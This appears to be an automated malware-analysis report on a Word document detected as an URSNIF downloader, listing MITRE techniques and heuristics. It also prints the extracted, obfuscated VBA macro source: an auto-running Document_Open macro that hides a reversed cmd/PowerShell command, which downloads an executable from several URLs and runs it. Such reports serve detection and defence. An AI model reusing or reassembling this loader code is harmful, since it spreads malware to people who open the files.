MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro that utilizes the Shell() function to execute a command. The ClamAV detection indicates this is a downloader, likely URSNIF. The script attempts to construct a command string that includes 'cmd /V /c set w0= ...', suggesting it's preparing to execute a downloaded payload. The presence of a Document_Open macro and the Shell() call strongly indicate a malicious document designed to execute arbitrary code.
Heuristics 6
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5039 bytes |
SHA-256: cc19fc320d91f213dcc1da32ccd85441eb58d01120c0cd4cc9a2ad62c8785dc6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uPwEQEZXQA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(sDwqN) + SsrCmWI + IBvYRhOzwMvULm + nrzjjZTdGc + GonpP + oGGEGVbVfBwAJ + HCPOmvSjKoBuAd, vbHide
End Sub
Attribute VB_Name = "GFGJwPBnnnaZ"
Function nrzjjZTdGc()
On _
Error _
Resume _
Next
Month "NPbN" + "4950"
GiBUrKwEl = Chr(10 + 6 + 11 + 4 + 68) + "md " + "/V/" + Chr(7 + 4 + 7 + 2 + 47) + Chr(3 + 2 + 3 + 1 + 25) + "^" + "se^t " + "w" + "^0=^ " + " ^ ^ " + "^"
Month "3467" + "cDG"
LGAOzWMb = " ^ " + "^ ^" + " ^ ^" + " " + "}}^{h" + Chr(10 + 6 + 11 + 4 + 68) + "ta" + Chr(10 + 6 + 11 + 4 + 68) + "};ka" + "e" + "r^b;" + "au^X$ "
Month "chC" + "qmPvkwBQJ" + "RwsAEDtXAAXMK" + "pju"
Month "c" + "cnBqEa"
JRjNfQivTD = "^me^" + "t" + "^I-^e" + "^k" + "^ov" + "nI" + "^;)^a" + "u" + "X"
Month "7130" + "w" + "poKWtIMX" + "VEwDWbO"
Month "z" + "244940468" + "3713" + "8635"
iSQSni = "$^ ^" + ",^fF^Y" + "^$(^el" + "^" + "i^Fd" + "a^" + "o^"
Month "H" + "248271863" + "2621" + "16016907"
Month "iGECl" + "BtlvwKOPiA"
INMcrfPEYE = "ln^w^o" + "D^" + ".o^P^F$" + "{" + "^yr" + "t^{)"
Month "2861" + "p" + "344661285" + "1144"
Month "ki" + "tGtuzzpL"
CIwToDhVTz = "lu^" + "t" + "$^ ni " + "^fF^Y^" + "$(" + "^h" + Chr(10 + 6 + 11 + 4 + 68) + "a^" + "er^of;" + "'^e^x" + "^e^.^'+" + "^L^jp^$" + "^+^" + "'^\" + "'"
Month "S" + "WdVo"
Month "CtH" + "173327705"
fFtotBURI = "^+" + Chr(10 + 6 + 11 + 4 + 68) + "^il^bu^" + "p" + ":v" + "ne$=" + "a^u^X^$" + ";" + "'^90^" + "4'^" + " ^=" + "^ ^Lj" + "p$" + "^;)'"
Month "2696" + "a" + "v" + "233495919"
Month "P" + "VL" + "3261" + "3870"
Month "wC" + "ih" + "5087" + "8026"
Month "6765" + "56954898" + "3740" + "Izm"
ZCfOf = "^@^'(t^" + "il^p^" + "S^.^'" + "^d^" + "M^" + "6t2" + "Kd^" + "3^D/^mo"
Month "3518" + "TmfbjzmuNq" + "qu" + "4814"
Month "2024" + "tiwj" + "225528419" + "BNpwNv"
Month "FB" + "Lo"
qPHVUuCo = Chr(10 + 6 + 11 + 4 + 68) + ".^dw" + "r^ad" + ".^kh" + "//:p^" + "t" + "^"
Month "ju" + "OEhuIOFMcqMv"
Month "7780" + "qjGzjO"
Month "S" + "USj"
Month "i" + "524003915" + "LTMBhAzK" + "8645"
OoKzKKk = "t^" + "h@X" + Chr(7 + 4 + 7 + 2 + 47) + "^Fn" + "eg21/^m" + "o" + Chr(10 + 6 + 11 + 4 + 68) + ".n" + "eyugn^" + "o^a" + Chr(10 + 6 + 11 + 4 + 68) + "^hn^a"
Month "457792688" + "274667763"
Month "380866548" + "NtFkd"
Month "OQAjEL" + "sipB"
aunwROA = "^h" + "^ul//" + ":" + "ptt" + "h" + "@^"
nrzjjZTdGc = GiBUrKwEl + LGAOzWMb + JRjNfQivTD + iSQSni + INMcrfPEYE + CIwToDhVTz + fFtotBURI + ZCfOf + qPHVUuCo + OoKzKKk + aunwROA
Month "tBHiQ" + "LoQ" + "1058" + "9789"
End Function
Function GonpP()
On _
Error _
Resume _
Next
Month "k" + "vFij"
UzwjvTEm = "03Jg^W" + "^2^0y/^" + "m^o" + Chr(10 + 6 + 11 + 4 + 68) + ".l" + "^" + "evar" + "t^tah^" + "p^hni^"
Month "4639" + "jKHBGEcjrhD"
UEvwL = "h^" + "t" + "i^a^h" + "k//^:^" + "p" + "^tt^h@R" + "Q"
Month "255885610" + "9153"
Month "wGNiUaAz" + "CaCwdGR"
UZCfClP = "GGH" + Chr(10 + 6 + 11 + 4 + 68) + "Bj" + "/nv" + "^.r^" + "o" + Chr(10 + 6 + 11 + 4 + 68) + "e^" + "d" + Chr(10 + 6 + 11 + 4 + 68) + "i^" + "s^a^b.n"
Month "MrzcJLjF" + "240166343"
Month "2185" + "9710"
Month "6910" + "z" + "90" + "zEHcWVfLjKhzj"
ZUjMnQLw = "^g^ise" + "^d/" + "/:p^tth" + "^@t" + "3d"
Month "3207" + "lP" + "a" + "I"
Month "dDXl" + "bj" + "Fj" + "9267"
iKDAzhCs = "I^DB" + "x" + "/t" + "p.^" + "adalerp" + "a^" + "d^air^" + "ar" + "e" + "n" + "u^f//"
Month "440766310" + "8143" + "dufwij" + "RddJCwnDw"
Month "DHjdK" + "512651410"
Month "4829" + "qFIzTztpEiKtA"
Month "ibhE" + "404138178"
Month "kHUYbWcRhzZO" + "WocYhmM"
avdwRT = ":^p^t^" + "th'" + "=" + "l^" + "u^t" + "^" + "$^" + ";tn^eil" + Chr(7 + 4 + 7 + 2 + 47) + "^b^" + "eW.teN" + " t" + Chr(10 + 6 + 11 + 4 + 68)
Month "iaw" + "On
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.